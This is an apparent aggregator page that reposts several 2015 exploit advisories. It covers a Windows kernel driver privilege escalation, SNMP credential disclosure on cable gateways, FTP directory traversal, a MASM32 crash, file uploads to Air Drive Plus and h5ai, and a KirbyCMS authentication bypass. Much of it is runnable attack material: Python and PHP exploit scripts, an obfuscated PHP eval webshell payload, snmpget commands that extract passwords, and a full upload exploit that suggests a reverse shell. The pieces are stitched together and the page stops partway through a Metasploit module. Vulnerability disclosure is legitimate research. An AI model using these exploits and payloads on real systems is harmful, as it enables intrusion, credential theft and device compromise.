KL-001-2015-005 : VBox Satellite Express Arbitrary Write Privilege Escalation
Title: VBox Satellite Express Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2015-005
Publication Date: 2015.09.16
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-005.txt
1. Vulnerability Details
Affected Vendor: VBox Communications
Affected Product: Satellite Express Protocol
Affected Version: 2.3.17.3
Platform: Microsoft Windows XP SP3, Microsoft Windows 7 (x86)
CWE Classification: CWE-123: Write-what-where condition
Impact: Arbitrary Code Execution
Attack vector: IOCTL
CVE-ID: CVE-2015-6923
2. Vulnerability Description
A vulnerability within the ndvbs module allows an attacker
to inject memory they control into an arbitrary location they
define. This vulnerability can be used to overwrite function
pointers in HalDispatchTable resulting in an elevation of
privilege.
3. Technical Description
Example against Windows XP:
Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 2600.xpsp_sp3_qfe.101209-1646
Machine Name:
Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0
Debug session time: Tue Mar 10 18:57:54.259 2015 (UTC - 7:00)
System Uptime: 0 days 0:11:19.843
*********************************************************************
* *
* Bugcheck Analysis *
* *
*********************************************************************
Use !analyze -v to get detailed debugging information.
BugCheck 50, {b41c5d4c, 0, 805068e1, 0}
Probably caused by : ndvbs.sys ( ndvbs+94f )
Followup: MachineOwner
---------
kd> kn
Call stack: # ChildEBP RetAddr
00 f64fda98 8051cc7f nt!KeBugCheckEx+0x1b
01 f64fdaf8 805405d4 nt!MmAccessFault+0x8e7
02 f64fdaf8 805068e1 nt!KiTrap0E+0xcc
03 f64fdbb0 80506aae nt!MmMapLockedPagesSpecifyCache+0x211
04 f64fdbd0 f650e94f nt!MmMapLockedPages+0x18
05 f64fdc34 804ee129 ndvbs+0x94f
06 f64fdc44 80574e56 nt!IopfCallDriver+0x31
07 f64fdc58 80575d11 nt!IopSynchronousServiceTail+0x70
08 f64fdd00 8056e57c nt!IopXxxControlFile+0x5e7
09 f64fdd34 8053d6d8 nt!NtDeviceIoControlFile+0x2a
0a f64fdd34 7c90e514 nt!KiFastCallEntry+0xf8
0b 0021f3e4 7c90d28a ntdll!KiFastSystemCallRet
0c 0021f3e8 1d1add7a ntdll!ZwDeviceIoControlFile+0xc
0d 0021f41c 1d1aca96 _ctypes!DllCanUnloadNow+0x5b4a
0e 0021f44c 1d1a8db8 _ctypes!DllCanUnloadNow+0x4866
0f 0021f4fc 1d1a959e _ctypes!DllCanUnloadNow+0xb88
10 0021f668 1d1a54d8 _ctypes!DllCanUnloadNow+0x136e
11 0021f6c0 1e07bd9c _ctypes+0x54d8
12 00000000 00000000 python27!PyObject_Call+0x4c
Example against Windows 7:
Microsoft (R) Windows Debugger Version 6.3.9600.17298 X86
Copyright (c) Microsoft Corporation. All rights reserved.
Windows 7 Kernel Version 7601 (Service Pack 1) UP Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS Personal
Built by: 7601.17514.x86fre.win7sp1_rtm.101119-1850
Kernel base = 0x8280c000 PsLoadedModuleList = 0x82956850
Debug session time: Tue Sep 15 15:08:38.938 2015 (UTC - 7:00)
System Uptime: 0 days 0:27:26.358
kd> .symfix;.reload
Loading Kernel Symbols
...............................................................
................................................................
........................
Loading User Symbols
Loading unloaded module list
........
kd> !analyze -v
**********************************************************************
* *
* Bugcheck Analysis *
* *
**********************************************************************
KERNEL_MODE_EXCEPTION_NOT_HANDLED_M (1000008e)
This is a very common bugcheck. Usually the exception address pinpoints
the driver/function that caused the problem. Always note this address
as well as the link date of the driver/image that contains this address.
Some common problems are exception code 0x80000003. This means a hard
coded breakpoint or assertion was hit, but this system was booted
/NODEBUG. This is not supposed to happen as developers should never have
hardcoded breakpoints in retail code, but ...
If this happens, make sure a debugger gets connected, and the
system is booted /DEBUG. This will let us see why this breakpoint is
happening.
Arguments:
Arg1: c0000005, The exception code that was not handled
Arg2: 929ef938, The address that the exception occurred at
Arg3: 974f4a34, Trap Frame
Arg4: 00000000
Debugging Details:
------------------
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx
referenced memory at 0x%08lx. The memory could not be %s.
FAULTING_IP:
ndvbs+938
929ef938 8b4604 mov eax,dword ptr [esi+4]
TRAP_FRAME: 974f4a34 -- (.trap 0xffffffff974f4a34)
ErrCode = 00000000
eax=00000000 ebx=85490880 ecx=85de2ae0 edx=85490810 esi=85490810 edi=8460a668
eip=929ef938 esp=974f4aa8 ebp=974f4afc iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246
ndvbs+0x938:
929ef938 8b4604 mov eax,dword ptr [esi+4]
Resetting default scope
CUSTOMER_CRASH_COUNT: 1
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x8E
PROCESS_NAME: python.exe
CURRENT_IRQL: 0
ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) x86fre
LAST_CONTROL_TRANSFER: from 82843593 to 929ef938
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
974f4afc 82843593 85de2a28 85490810 85490810 ndvbs+0x938
974f4b14 82a3799f 8460a668 85490810 85490880 nt!IofCallDriver+0x63
974f4b34 82a3ab71 85de2a28 8460a668 00000000 nt!IopSynchronousServiceTail+0x1f8
974f4bd0 82a813f4 85de2a28 85490810 00000000 nt!IopXxxControlFile+0x6aa
974f4c04 8284a1ea 00000078 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
974f4c04 76fa70b4 00000078 00000000 00000000 nt!KiFastCallEntry+0x12a
0021f99c 00000000 00000000 00000000 00000000 0x76fa70b4
STACK_COMMAND: kb
FOLLOWUP_IP:
ndvbs+938
929ef938 8b4604 mov eax,dword ptr [esi+4]
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: ndvbs+938
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: ndvbs
IMAGE_NAME: ndvbs.sys
DEBUG_FLR_IMAGE_TIMESTAMP: 3ec77b36
BUCKET_ID: OLD_IMAGE_ndvbs.sys
FAILURE_BUCKET_ID: OLD_IMAGE_ndvbs.sys
ANALYSIS_SOURCE: KM
FAILURE_ID_HASH_STRING: km:old_image_ndvbs.sys
FAILURE_ID_HASH: {e5b892ba-cc2c-e4a4-9b6e-5e8b63660e75}
Followup: MachineOwner
---------
4. Mitigation and Remediation Recommendation
No response from vendor; no remediation available.
5. Credit
This vulnerability was discovered by Matt Bergin of KoreLogic
Security, Inc.
6. Disclosure Timeline
2015.05.19 - KoreLogic requests a security contact from
info@vboxcomm.com.
2015.05.29 - KoreLogic requests a security contact from
{info,sales,marketing}@vboxcomm.com.
2015.08.03 - 45 business days have elapsed since KoreLogic's last
contact attempt.
2015.09.11 - KoreLogic requests CVE from Mitre.
2015.09.12 - Mitre issues CVE-2015-6923.
2015.09.16 - Public disclosure.
7. Proof of Concept
from sys import exit
from ctypes import *
NtAllocateVirtualMemory = windll.ntdll.NtAllocateVirtualMemory
WriteProcessMemory = windll.kernel32.WriteProcessMemory
DeviceIoControl = windll.ntdll.NtDeviceIoControlFile
CreateFileA = windll.kernel32.CreateFileA
CloseHandle = windll.kernel32.CloseHandle
FILE_SHARE_READ,FILE_SHARE_WRITE = 0,1
OPEN_EXISTING = 3
NULL = None
device = "ndvbs"
code = 0x00000ffd
inlen = 0x0
outlen = 0x0
inbuf = 0x1
outbuf = 0xffff0000
inBufMem = "\x90"*inlen
def main():
try:
handle = CreateFileA("\\\\.\\%s" %
(device),FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
if (handle == -1):
print "[-] error creating handle"
exit(1)
except Exception as e:
print "[-] error creating handle"
exit(1)
#NtAllocateVirtualMemory(-1,byref(c_int(inbuf)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)
DeviceIoControl(handle,NULL,NULL,NULL,byref(c_ulong(8)),code,inbuf,inlen,outbuf,outlen)
CloseHandle(handle)
return False
if __name__=="__main__":
main()
The contents of this advisory are copyright(c) 2015
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863293098
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Information Exposure via SNMP on Thomson CableHome Gateway
[MODEL: DWG849] Cable Modem Gateway
# Google Dork: n/a
# Date: 09/18/2015
# Exploit Author: Matt Dunlap
# Vendor Homepage:
http://www.technicolor.com/en/solutions-services/connected-home/modems-gateways
# Software Link: n/a
# Version: Thomson CableHome Gateway <<HW_REV: 1.0; VENDOR: Thomson; BOOTR:
2.1.7i; SW_REV: STC0.01.16; MODEL: *DWG849*>>
# Tested on: Ubuntu 14.04.3
# CVE : Not reported to vendor (yet)
Information Exposure via SNMP on Thomson CableHome Gateway [MODEL: DWG849]
Cable Modem Gateway
Affected Product:
Thomson CableHome Gateway <<MODEL: DWG849>> Cable Modem Gateway
NOTE: The model DWG850-4 is open to the same attack but doesn’t come with
the remote administration enabled (no web interface, no telnet)
Severity Rating:
Important
Impact:
Username and password for the user interface as well as wireless network
keys can be disclosed through SNMP.
At the time of posting this there are 61,505 results on Shodan for this
model.
By default there are 2 open ports: 161 (snmp), 8080 (web administration)
The default password of 4GIt3M has been set on every unit I’ve tested so far
Description:
The Thomson CableHome Gateway DWG849 Cable Modem Gateway product
specifications include SNMP v2 & v3 under Network Management. The
management information bases (MIBs) of various device subsystems on the
DWG849 allows local\remote network users to discover user interface
credentials and wireless network key values through simple SNMP requests
for the value of these variables. Given the security authentication in
SNMPv1 and SNMPv2c do not offer sufficient protection, this increases the
risk that the values can be disclosed through SNMP using the default
read-only community “private”.
Object Identifiers (OIDs):
Make, Model, Software Version:
1.3.6.1.2.1.1.1.0
1.3.6.1.2.1.1.3.0
Web Interface Username \ Password (DEFAULT: admin \ Uq-4GIt3M)
1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0
1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0
SSID and KEY
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32
1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32
Guest Network OIDs
Other OIDs of interest include
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.33
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.34
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.35
[POC]
snmpget -t15 -v 2c -c private [host] 1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0
1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0 1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32
1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32
This issue has not been reported to the vendor.
/*
---------------------------------------------------------------------
Konica Minolta FTP Utility directory traversal vulnerability
Url: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
Poc: http://shinnai.altervista.org/exploits/SH-0024-20150922.html
---------------------------------------------------------------------
*/
<?php
$local_file = 'boot.ini.txt';
$server_file = '..\..\..\..\..\..\..\..\boot.ini';
$conn_id = ftp_connect($ftp_server);
$login_result = ftp_login($conn_id, "anonymous", "anonymous");
if (ftp_get($conn_id, $local_file, $server_file, FTP_BINARY)) {
echo "Successfully written to $local_file\n";
} else {
echo "There was a problem\n";
}
ftp_close($conn_id);
?>
---------------------------------------------------------------------
# EXPLOIT TITLE: Masm32v11r Buffer Overflow(SEH overwrite) crash POC
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Date of Testing: 22nd September 2015
# Download Link : http://www.masm32.com/masmdl.htm
# Tested On : Windows 10
# Steps to Crash :-
# Step 1: Execute this python script
# Step 2: This script will create a file called MASM_crash.txt
# Step 3: Now open Masm32's QUICK EDITOR
# Step 4: Go to Script > 'Convert Text to Script'
# Step 5: Open the MASM_crash.txt to convert
# Step 6: That should crash the program .
file = open('MASM_crash.txt' , 'w');
buffer = "A"*4676 + "B"*4 + "C"*4 + "D"*500
file.write(buffer);
file.close()
Document Title:
===============
Air Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1597
Release Date:
=============
2015-09-21
Vulnerability Laboratory ID (VL-ID):
====================================
1597
Common Vulnerability Scoring System:
====================================
8.7
Product & Service Introduction:
===============================
Turn your iPhone, iPod touch, and iPad into a wireless disk. Share your files and photos over network, no USB cable or extra software required.
(Copy of the Vendor Homepage: https://itunes.apple.com/tr/app/air-drive-plus-your-file-manager/id422806570 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an arbitrary file upload web vulnerability in the official Photo Transfer 2 - v1.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-09-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Y.K. YING
Product: Air Drive Plus - iOS Mobile (Web-Application) 2.4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
An arbitrary file upload web vulnerability has been discovered in the official Air Drive Plus v2.4 iOS web-application.
The arbitrary file upload web vulnerability allows remote attackers to unauthorized include local file/path requests
or system specific path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `Upload` module. Remote attackers are able to inject own files with
malicious `filename` values in the `Upload` POST method request to compromise the mobile web-application. The local file/path include
execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker is able to inject the lfi payload
by usage of the wifi interface or local file sync function.
Attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious
attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.7.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege web-application user account.
Successful exploitation of the arbitrary file upload vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8000/)
Proof of Concept (PoC):
=======================
The arbitrary file upload web vulnerability can be exploited by remote attacker without privilege web-application user acocunt or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC Payload(s):
http://localhost:8000/AirDriveAction_file_show/%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]%20src=a%3E2.png
PoC: Source (Upload File)
<tbody id="files"><tr><td colspan="8"><a href="#" onclick="javascript:loadfiles("/AirDriveAction_ROOTLV")">.</a></td></tr><tr><td colspan="8"><a href="#" onclick="javascript:loadfiles("/AirDriveAction_UPPERLV")">..</a></td></tr><tr class=""><td><img src="./images/file.png" height="20px" width="20px"></td><td><a target="_blank" href="/AirDriveAction_file_show/68-2.png">68-2.png</a></td><td>24,27KB</td><td align="center">2015-09-11 13:13:25</td><td align="center"><a onclick="javascript:delfile("68-2.png");" class="transparent_button">Delete</a></td></tr><tr class=""><td><img src="./images/file.png" height="20px" width="20px"></td><td><a target="_blank" href="/AirDriveAction_file_show/%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]">2.png</a></td><td>538,00B</td><td align='center'>2015-09-11 13:17:21</td><td align='center'><a onclick='javascript:delfile("%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]%20src=a%3E2.png");' class='transparent_button'>Delete</a></td></tr></tbody></table></iframe></a></td></tr></tbody>
--- PoC Session Logs [POST] ---
Status: pending[]
POST http://localhost:8000/AirDriveAction_file_add Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8000:8000]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8000/index_files.html]
POST-Daten:
POST_DATA[-----------------------------52852184124488
Content-Disposition: form-data; name="uploadfile"; filename="<?php
//Obfuscation provided by BKM - PHP Obfuscator v2.47: $kda1640d3bfb="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";@eval($kda1640d3bfb(
"JGU3NTJiNzQxMTZhYzYwMjUzMDFiYWNlOGUwZTA2YmNiPSJc ... ... ...2MVx4MzhcNjJceDMwXDY3XHgzOFw2M1x4MzlcNjBceDM3XDE0Mlx4MzZcNjdceDM5XDE0NFx4MzVcMTQzXHg2Nlw
xNDZceDY1XDYzXHgzN1wxNDEiKT8kYjdkOTFjZDYwMzJlNDRiNDgzY2Y5MGRhOWM4ZmI1MDAoKTokdTZiZmM2YmN
jZjRiMjk4ZDkyZTQzMzFhMzY3MzllMjAoKTs="));
?>
2.png"
Content-Type: image/png
Status: 200[OK]
GET http://localhost:8000/a[ARBITRARY FILE UPLOAD VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8000]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8000/index_files.html]
Reference(s):
http://localhost:8000/index_files.html
http://localhost:8000/AirDriveAction_file_add/
http://1localhost:8000/AirDriveAction_file_show/
Security Risk:
==============
The security risk of the arbitrary file upload web vulnerability in the filename value is estimated as high. (CVSS 8.7)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
#!/usr/bin/env python
# Exploit Title: h5ai < 0.25.0 Unrestricted File Upload
# Date: 21 September 2015
# Exploit Author: rTheory
# Vendor Homepage: https://larsjung.de/h5ai/
# Vulnerable Software Link: https://web.archive.org/web/20140208063613/http://release.larsjung.de/h5ai/h5ai-0.24.0.zip
# Vulnerable Versions: 0.22.0 - 0.24.1
# Tested on: 0.24.0 running on Apache
# CVE : 2015-3203
import urllib
import urllib2
import socket
import os
import getopt
import sys
# Globals with default options
url = ''
path = '/'
fileName = ''
filePath = ''
verboseMode = False
def header():
print '+-----------------------------------------------+'
print '| File upload exploit for h5ai v0.22.0 - 0.24.1 |'
print '| See CVE-2015-3203 for vulnerability details |'
print '+------------------- rTheory -------------------+'
def usage():
print
print 'Usage: %s -t target_url -f upload_file' % os.path.basename(__file__)
print '-t --target - The URL to connect to'
print ' ex: http://example.com'
print '-f --file - The file to upload'
print ' ex: php-reverse-shell.php'
print '-p --path - The path to upload to'
print ' Default is \'/\''
print '-v --verbose - Enable more verbose output'
print
print 'Examples:'
print '%s -t http://example.com:8080 -f php-reverse-shell.php' % os.path.basename(__file__)
print '%s -t http://192.168.1.100 -f php-reverse-shell.php -p /dir/' % os.path.basename(__file__)
sys.exit(0)
def main():
global url
global path
global fileName
global filePath
global verboseMode
header()
if not len(sys.argv[4:]):
print '[-] Incorrect number of arguments'
usage()
try:
opts, args = getopt.getopt(sys.argv[1:],"ht:f:p:v", ["help","target","file","path","verbose"])
except getopt.GetoptError as err:
print str(err)
usage()
for o,a in opts:
if o in ('-h','--help'):
usage()
elif o in ('-t','--target'):
url = a
elif o in ('-f','--file'):
fileName = a
elif o in ('-p','--path'):
path = a
elif o in ('-v','--verbose'):
verboseMode = True
else:
assert False,"Unhandled Option"
# Test target URL, target file, and path inputs for validity
if not url.startswith('http'):
print '[-] Error: Target URL must start with http:// or https://'
usage()
if not os.path.isfile(fileName):
print '[-] Error: File does not appear to exist'
usage()
if not (path.startswith('/') and path.endswith('/')):
print '[-] Error: Path must start and end with a \'/\''
usage()
# Determine target host, which is the URL minus the leading protocol
if url.find('http://') != -1:
host = url[7:]
elif url.find('https://') != -1:
host = url[8:]
else:
host = url
# Store the contents of the upload file into a string
print '[+] Reading upload file'
f = open(fileName,'r')
fileContents = f.read()
f.close()
MPFB = 'multipartformboundary1442784669030' # constant string used for MIME info
# Header information. Content-Length not needed.
http_header = {
"Host" : host,
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
"Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language" : "en-us,en;q=0.5",
"Accept-Encoding" : "gzip, deflate",
"Content-type" : "multipart/form-data; boundary=------" + MPFB,
"X-Requested-With" : "XMLHttpRequest",
"Referer" : url + path,
"Connection" : "keep-alive"
}
# POST parameter for file upload
payload = '--------'+MPFB+'\r\nContent-Disposition: form-data; name="action"\r\n\r\nupload\r\n'
payload += '--------'+MPFB+'\r\nContent-Disposition: form-data; name="href"\r\n\r\n'+path+'\r\n'
payload += '--------'+MPFB+'\r\nContent-Disposition: form-data; name="userfile"; filename="'+fileName+'"\r\nContent-Type: \r\n\r\n'+fileContents+'\r\n'
payload += '--------'+MPFB+'--\r\n'
socket.setdefaulttimeout(5)
opener = urllib2.build_opener()
req = urllib2.Request(url, payload, http_header)
# submit request and print output. Expected: "code 0"
try:
print '[+] Sending exploit POST request'
res = opener.open(req)
html = res.read()
if verboseMode: print '[+] Server returned: ' + html
except:
print '[-] Socket timed out, but it might still have worked...'
# close the connection
opener.close()
# Last step: check to see if the file uploaded (performed outside of this function)
filePath = url + path + fileName
print '[+] Checking to see if the file uploaded:'
print '[+] ' + filePath
def postCheck():
# Check to see if the file exists
# This may work now that everything from main() was torn down
global filePath
try:
urllib2.urlopen(filePath)
print '[+] File uploaded successfully!'
except urllib2.HTTPError, e:
print '[-] File did not appear to upload'
except urllib2.URLError, e:
print '[-] File did not appear to upload'
main()
postCheck()
=============================================
- Release date: 14.09.2015
- Discovered by: Dawid Golunski
- Severity: Medium/High
=============================================
I. VULNERABILITY
-------------------------
Kirby CMS <= 2.1.0 Authentication Bypass via Path Traversal
II. BACKGROUND
-------------------------
- Kirby CMS
"Kirby is a file‑based CMS
Easy to setup. Easy to use. Flexible as hell."
http://getkirby.com/
III. INTRODUCTION
-------------------------
KirbyCMS has a vulnerability that allows to bypass authentication in a hosting
environment where users within the same shared environment can save/read files
in a directory accessible by both the victim and the attacker.
IV. DESCRIPTION
-------------------------
As KirbyCMS is a file based CMS, it also stores authentication data
within files in accounts directory, each user has its own password file such as:
kirby/site/accounts/[username].php
At login, KirbyCMS refer to the password file to verify the passwor hash.
During the process, it fails to validate the resulting path to ensure that
it does not contain path traversal sequences such as '../' within the login
variable provided by a user.
This makes it vulnerable to a path traversal attack and allows to bypass
the authentication if an attacker is located in the same multi-user hosting
environment and can write files to a public directory such as /tmp accessible
by the victim site with KirbyCMS.
The exact code responsible for this vulnerability is located in
kirby/core/user.php file and is shown below:
---[ kirby/core/user.php ]---
abstract class UserAbstract {
protected $username = null;
protected $cache = array();
protected $data = null;
public function __construct($username) {
$this->username = str::lower($username);
// check if the account file exists
if(!file_exists($this->file())) {
throw new Exception('The user account could not be found');
}
...
}
protected function file() {
return kirby::instance()->roots()->accounts() . DS . $this->username() . '.php';
}
-----------------------------
In addition to the authentication bypass KirbyCMS was found to allow
authentication over HTTP protocol (resulting in passwords being sent
unencrypted), and to never expire authenticated sessions.
V. PROOF OF CONCEPT
-------------------------
KirbyCMS stores credentials in: kirby/site/accounts directory as PHP files
to prevent the contents from being accessed directly via the web server.
An example file with credentials looks as follows:
---[ victimuser.php ]---
<?php if(!defined('KIRBY')) exit ?>
username: victim
email: victim@mailserver.com
password: >
$2a$10$B3DQ5e40XQOSUDSrA4AnxeolXJNDBb5KBNfkOCKlAjznvDU7IuqpC
language: en
role: admin
------------------------
To bypass the authentication an attacker who has an account in the same
hosting environment as the victim can write the above credentials file
containing an encrypted hash of the password: trythisout
into a public directory such as:
/tmp/bypassauth.php
Because of the aformentioned Path Traversal vulnerability the attacker
can use such credentials and log in as an administrator
(via: http://victim-server.com/kirby/panel/login) with:
Username: ../../../../../../../../tmp/bypassauth
Password: trythisout
which will produce a HTTP POST request similar to:
POST /kirby/panel/login HTTP/1.1
Host: victim_kirby_site
Cookie: PHPSESSID=mqhncr49bpbgnt9kqrp055v7r6; kirby=58eddb6...
Content-Length: 149
username=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fbypassauth&password=trythisout&_csfr=erQ1UvOm2L1...
This will cause KirbyCMS to load credentials from the path:
/sites/victim/kirby/site/accounts/../../../../../../../../tmp/bypassauth.php
As a result, the attacker will get the following response:
<h2 class="hgroup hgroup-single-line cf">
<span class="hgroup-title">
<a href="#/users/edit/../../../../../../../../tmp/bypassauth">Your account</a>
</span>
<span class="hgroup-options shiv shiv-dark shiv-left">
getting access to the KirbyCMS control panel with admin rights.
VI. BUSINESS IMPACT
-------------------------
Users who make use of vulnerable versions of KirbyCMS in shared hosting
environments are at risk of having their website modified by unauthorized users.
An attacker who manages to log in as an administrator will be able to change
all the existing content as well as upload new files.
This attack could be combined with the: 'CSRF Content Upload and PHP Script
Execution' vulnerability, also discovered by Dawid Golunski and described in a
separate document.
VII. SYSTEMS AFFECTED
-------------------------
The latest version of KirbyCMS (2.1.0) was confirmed to be exploitable.
To exploit the vulnerability an attacker must be able to write a malicious
credentials file on the system in a public directory that is accessible by the
victim KirbyCMS site. This is a common situation on many hosting environments
that allow to write/read files from temporary directories such as /tmp,
/var/tmp etc.
Such file could potentially also be uploaded by other means, even if
the attacker does not have an account on the same server, such as anonymous FTP
, an email attachment which gets saved in a tmp file on the server etc.
VIII. SOLUTION
-------------------------
Upgrade to the patched version 2.1.1 released by the vendor upon this advisory.
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/KirbyCMS-Path-Traversal-Authentication-Bypass-Vulnerability.txt
http://getkirby.com/
http://seclists.org/fulldisclosure/2015/Sep/index.html
http://www.securiteam.com/
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XI. REVISION HISTORY
-------------------------
14.09.2015 - Final
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Ftp
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow',
'Description' => %q{
This module exploits an SEH overflow in Konica Minolta FTP Server 1.00.
Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which
